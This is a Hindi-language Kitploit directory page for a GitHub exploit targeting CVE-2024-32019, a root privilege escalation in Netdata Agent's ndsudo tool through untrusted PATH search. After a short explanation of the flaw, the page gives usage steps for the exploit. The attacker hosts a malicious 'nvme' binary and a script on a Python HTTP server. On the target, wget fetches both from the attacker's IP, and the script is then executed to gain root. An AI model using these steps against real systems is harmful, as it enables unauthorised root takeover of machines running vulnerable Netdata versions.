Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2024-32019-ndsudo — Bash-आधारित विशेषाधिकार वृद्धि शोषण CVE-2024-32019 के लिए Netdata Agent के ndsudo टूल में, अविश्वसनीय PATH खोज का लाभ उठाकर रूट अनुमतियों के साथ मनमाने बाइनरी निष्पादित करता है। | Kitploit
उपकरण/GitHubGitHub/justjoeyking/cve-2024-32019-ndsudo
विशेषाधिकार वृद्धिभेद्यता विश्लेषणशोषणपोस्ट-शोषणपेनिट्रेशन टेस्टिंगरेड टीमिंग
GitHubjustjoeyking/cve-2024-32019-ndsudo

CVE-2024-32019-ndsudo

Bash-आधारित विशेषाधिकार वृद्धि शोषण CVE-2024-32019 के लिए Netdata Agent के ndsudo टूल में, अविश्वसनीय PATH खोज का लाभ उठाकर रूट अनुमतियों के साथ मनमाने बाइनरी निष्पादित करता है।

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
रिपॉजिटरी देखें
129 महीने पहलेअभी तक समीक्षित नहीं

ndsudo भेद्यता एक हमलावर को ndsudo टूल में एक अविश्वसनीय खोज पथ का फायदा उठाकर रूट अनुमतियाँ प्राप्त करने की अनुमति देती है, जो Netdata Agent का हिस्सा है। यदि हमलावर किसी लिखने-योग्य निर्देशिका में एक दुर्भावनापूर्ण बाइनरी रखता है और तदनुसार PATH पर्यावरण चर को संशोधित करता है, तो यह ऊँचे विशेषाधिकारों के साथ मनमाने प्रोग्रामों के निष्पादन को सक्षम कर सकता है।

CVE-2024-32019 के रूप में पहचानी गई ndsudo भेद्यता, Netdata Agent के साथ शामिल ndsudo टूल के संस्करणों को प्रभावित करती है, विशेष रूप से v1.45.0 और उससे नीचे के संस्करणों को। यह भेद्यता हमलावरों को उन प्रणालियों पर विशेषाधिकार बढ़ाने की अनुमति देती है जहाँ टूल स्थापित है।

भेद्यता कैसे काम करती है:

शोषण का तंत्र:-

  • अविश्वसनीय खोज पथ: ndsudo टूल बाहरी कमांडों का पता लगाने के लिए PATH पर्यावरण चर का उपयोग करता है। एक हमलावर इस चर को अपने नियंत्रण वाली निर्देशिका की ओर इंगित करने के लिए हेरफेर कर सकता है।

  • दुर्भावनापूर्ण बाइनरी का निष्पादन: ndsudo को चलाने की अनुमति वाले कमांड (जैसे nvme) के समान नाम वाली एक दुर्भावनापूर्ण निष्पादन योग्य फ़ाइल को लिखने-योग्य निर्देशिका में रखकर, हमलावर रूट अनुमतियों के साथ मनमाना कोड निष्पादित कर सकता है।

हमले की जटिलता:-

  • कम जटिलता: हमले के लिए उन्नत कौशल की आवश्यकता नहीं होती है, आसानी से तैयार किया गया bash स्क्रिप्ट priviesc के लिए इस्तेमाल किया जा सकता है, जिससे यह कई संभावित हमलावरों के लिए सुलभ हो जाता है।

भेद्यता का प्रभाव:-

  • विशेषाधिकार वृद्धि: सफल शोषण हमलावर को रूट एक्सेस प्राप्त करने की अनुमति देता है, जो प्रभावित प्रणाली पर पूर्ण नियंत्रण की स्थिति पैदा कर सकता है।

  • संभावित जोखिम: इसके परिणामस्वरूप अनधिकृत डेटा एक्सेस, सिस्टम हेरफेर, और नेटवर्क संसाधनों का आगे शोषण हो सकता है।

विशेषाधिकार वृद्धि मैंने उपयोगकर्ता से रूट तक आसानी से एक्सेस प्राप्त करने के लिए दो bash स्क्रिप्ट बनाई हैं। नीचे दिए गए चरणों का पालन करें :-

root@kitploit:~
  git clone https://github.com/justjoeyking/CVE-2024-32019-ndsudo.git

  cd CVE-2024-32019-ndsudo

  chmod +x ndsudo_exp.sh

अब python सर्वर बनाएं :

root@kitploit:~
  python3 -m http.server 8080

ndsudo_exploit.sh फ़ाइल को gedit या pluma, जो भी उपलब्ध हो, का उपयोग करके खोलें। आपको इस प्रकार का wget कमांड दिखाई देगा :

root@kitploit:~
  wget http://10.10.14.70:8080/nvme -o /tmp/nvme

IP-address को अपनी मशीन के IP में बदलें

अब टारगेट मशीन पर जाएं, टर्मिनल खोलें और निम्नलिखित करें:

root@kitploit:~
  wget http://<your-ip-addr>:8080/ndsudo_exploit.sh

  chmod +x ndsudo_exploit.sh

  ./ndsudo_exploit.sh
टूल डाउनलोड करें